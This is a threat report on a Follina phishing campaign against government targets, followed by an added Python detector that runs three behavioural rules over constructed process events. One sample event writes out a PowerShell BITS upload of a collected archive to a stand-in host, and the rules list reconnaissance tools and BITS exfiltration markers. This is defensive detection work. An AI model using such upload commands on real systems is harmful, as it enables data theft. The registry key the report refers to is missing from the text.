Local US and European governments were the targets of a phishing campaign using a payload designed to exploit CVE-2022-30190, also known as Follina. The phishing campaign contained malicious Rich Text Format (RTF) documents that would trigger the exploit when the user opened them.
These malicious documents, which used salary increase promises to bait employees into opening them, were crafted to exploit Follina and deploy a PowerShell script. This PowerShell script was written to first check if the system is a virtual machine and then steal information from the infected system. The information gathered included: saved passwords from multiple web browsers, data from other applications including email clients and chat services, and computer/domain information about the system itself. Once this information is gathered, the script uploads the data to a remote, attacker-controlled system using a Background Intelligent Transfer Service (BITS) job.
Due to the extensive reconnaissance performed by the PowerShell payload and the concentration of government targets, this campaign is believed to originate from a state-aligned actor. However, the specific state-aligned actor behind the campaign is currently unknown.
It is highly recommended to implement Microsoft’s guidance to help mitigate the Follina vulnerability until a patch can be properly applied. The guidance recommends first backing up and then deleting the following registry key:
This recommendation can be applied via Group Policy to mitigate all systems at once, or by running a command such as reg.exe manually on each system. The activity performed by the malicious payload can also be detected and alerted upon. Microsoft Word spawning a child msdt.exe process, PowerShell executing a number of built-in Windows reconnaissance commands in quick succession, and PowerShell creating a BITS job to a remote destination are all abnormal behaviors that can be monitored for. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these types of detection needs.
— Threat Insight (@threatinsight) June 3, 2022
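As an added example (not code from the original post or from Binary Defense), the following Python detector applies the three behavioral rules described above to constructed Sysmon-style process-creation records: Word spawning msdt.exe, a PowerShell parent launching several reconnaissance binaries within a short window, and PowerShell invoking BITS with a remote URL on its command line. The record schema, the list of reconnaissance binaries, the threshold and window values, and all sample paths, timestamps and hostnames are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Tunables and name lists are assumptions for this example, not from the post.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
OFFICE_IMAGES = {"winword.exe"}  # the post describes Word; other Office hosts can be added
RECON_IMAGES = {"whoami.exe", "hostname.exe", "systeminfo.exe", "ipconfig.exe",
                "net.exe", "net1.exe", "nltest.exe", "tasklist.exe", "wmic.exe", "arp.exe"}
BITS_MARKERS = ("start-bitstransfer", "bitsadmin")   # cmdlet and legacy CLI, lower-cased
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; constructed schema)."""
    ts: datetime
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, so rules ignore install location."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_office_spawns_msdt(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Rule 1: Word (or another listed Office host) launching msdt.exe as a child."""
    return [e for e in events
            if basename(e.parent_image) in OFFICE_IMAGES and basename(e.image) == "msdt.exe"]


def detect_recon_burst(events: List[ProcessEvent], threshold: int = 4,
                       window: timedelta = timedelta(seconds=60)) -> List[ProcessEvent]:
    """Rule 2: PowerShell parents launching `threshold` or more recon binaries within `window`.
    Returns the first qualifying burst (simplified: not grouped per parent PID)."""
    recon = sorted((e for e in events
                    if basename(e.parent_image) in POWERSHELL_IMAGES
                    and basename(e.image) in RECON_IMAGES),
                   key=lambda e: e.ts)
    for i, first in enumerate(recon):
        burst = [e for e in recon[i:] if e.ts - first.ts <= window]
        if len(burst) >= threshold:
            return burst
    return []


def detect_powershell_bits_remote(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Rule 3: PowerShell invoking BITS with an http(s) URL on its command line."""
    hits = []
    for e in events:
        if basename(e.image) not in POWERSHELL_IMAGES:
            continue
        lowered = e.command_line.lower()
        if any(m in lowered for m in BITS_MARKERS) and REMOTE_URL.search(e.command_line):
            hits.append(e)
    return hits


def run_detections(events: List[ProcessEvent]) -> Dict[str, List[ProcessEvent]]:
    """Run all rules; returns rule name -> matching events (empty dict means nothing fired)."""
    alerts: Dict[str, List[ProcessEvent]] = {}
    for name, rule in (("office_spawns_msdt", detect_office_spawns_msdt),
                       ("powershell_recon_burst", detect_recon_burst),
                       ("powershell_bits_remote", detect_powershell_bits_remote)):
        hits = rule(events)
        if hits:
            alerts[name] = hits
    return alerts


# Constructed sample telemetry (paths, times and hostnames are made up for this example).
T0 = datetime(2022, 6, 3, 9, 0, 0)
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"


def sample_events() -> List[ProcessEvent]:
    """Constructed chain mirroring the behaviors the post describes."""
    evts = [ProcessEvent(T0, SYS32 + r"\msdt.exe", WORD, "msdt.exe <arguments omitted in sample>")]
    for i, tool in enumerate(["whoami.exe", "hostname.exe", "systeminfo.exe", "ipconfig.exe", "net.exe"]):
        evts.append(ProcessEvent(T0 + timedelta(seconds=5 + 3 * i), SYS32 + "\\" + tool, PS, tool))
    evts.append(ProcessEvent(T0 + timedelta(seconds=40), PS, SYS32 + r"\cmd.exe",
                             'powershell.exe -NoProfile -Command "Start-BitsTransfer '
                             '-Source C:\\Users\\Public\\collect.zip '
                             '-Destination https://upload.example.invalid/api -TransferType Upload"'))
    return evts


def benign_events() -> List[ProcessEvent]:
    """Constructed admin activity that should not fire: one recon command and a local BITS copy."""
    return [
        ProcessEvent(T0, SYS32 + r"\whoami.exe", PS, "whoami.exe /all"),
        ProcessEvent(T0 + timedelta(seconds=2), PS, SYS32 + r"\explorer.exe",
                     'powershell.exe -Command "Start-BitsTransfer -Source \\\\fileserver\\share\\tools.zip '
                     '-Destination C:\\Temp"'),
    ]


if __name__ == "__main__":
    for name, hits in run_detections(sample_events()).items():
        print(f"[ALERT] {name}: {len(hits)} event(s), first at {hits[0].ts:%H:%M:%S}")
```

Rule 2 trades precision for simplicity by counting recon children of any PowerShell parent rather than per parent process ID; in production telemetry, keying the window on the parent's process GUID avoids merging unrelated admin sessions. Rule 3 looks only at the command line, so a script that builds the URL at runtime would need a BITS-Client operational log source instead.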